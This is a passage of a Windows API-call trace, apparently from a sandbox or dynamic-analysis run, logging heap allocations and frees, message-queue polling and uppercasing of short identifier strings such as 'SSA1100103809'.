(HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0208.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0208.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0208.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaca8 [0208.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabd0 [0208.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0208.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0208.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0208.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0208.496] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0208.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0208.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa8b8 [0208.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0208.497] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0208.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0208.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaba0 [0208.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacc0 [0208.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0208.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac60 [0208.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0208.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0208.497] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0208.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0208.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0208.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0208.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0208.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0208.497] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0208.497] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0208.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0208.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0208.497] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0208.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaac60 [0208.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a748f8 [0208.498] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0208.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0208.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabe8 [0208.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad68 [0208.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0208.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacc0 [0208.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0208.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0208.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0208.498] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0208.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0208.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0208.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0208.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0208.498] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0208.498] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0208.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0208.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad20 [0208.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0208.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0208.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0208.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0208.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0208.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0208.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0208.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a748f8 | out: hHeap=0x2af0000) returned 1 [0208.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0208.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0208.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0208.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0208.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab58 [0208.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0208.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacf0 [0208.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0208.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0208.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0208.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0208.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0208.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0208.499] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0208.500] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0208.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0208.500] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0208.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0208.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaac60 [0208.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73f20 [0208.500] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0208.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0208.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab40 [0208.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaba0 [0208.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0208.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac00 [0208.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0208.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0208.500] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0208.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0208.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0208.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0208.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0208.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0208.501] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0208.501] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0208.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad68 [0208.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab88 [0208.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0208.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab70 [0208.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0208.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0208.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0208.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0208.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0208.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacc0 [0208.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacd8 [0208.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0208.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0208.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0208.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0208.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0208.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0208.501] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73f20 | out: hHeap=0x2af0000) returned 1 [0208.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0208.501] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0208.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0208.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0208.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.502] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0208.502] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0208.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0208.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0208.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0208.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0208.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0208.502] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0208.502] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0208.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0208.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacc0 [0208.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0208.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0208.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0208.502] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0208.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaabe8 [0208.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0208.503] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0208.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0208.503] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0208.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0208.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0208.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0208.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0208.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0208.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.503] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0208.503] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0208.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0208.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0208.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0208.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0208.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0208.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0208.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 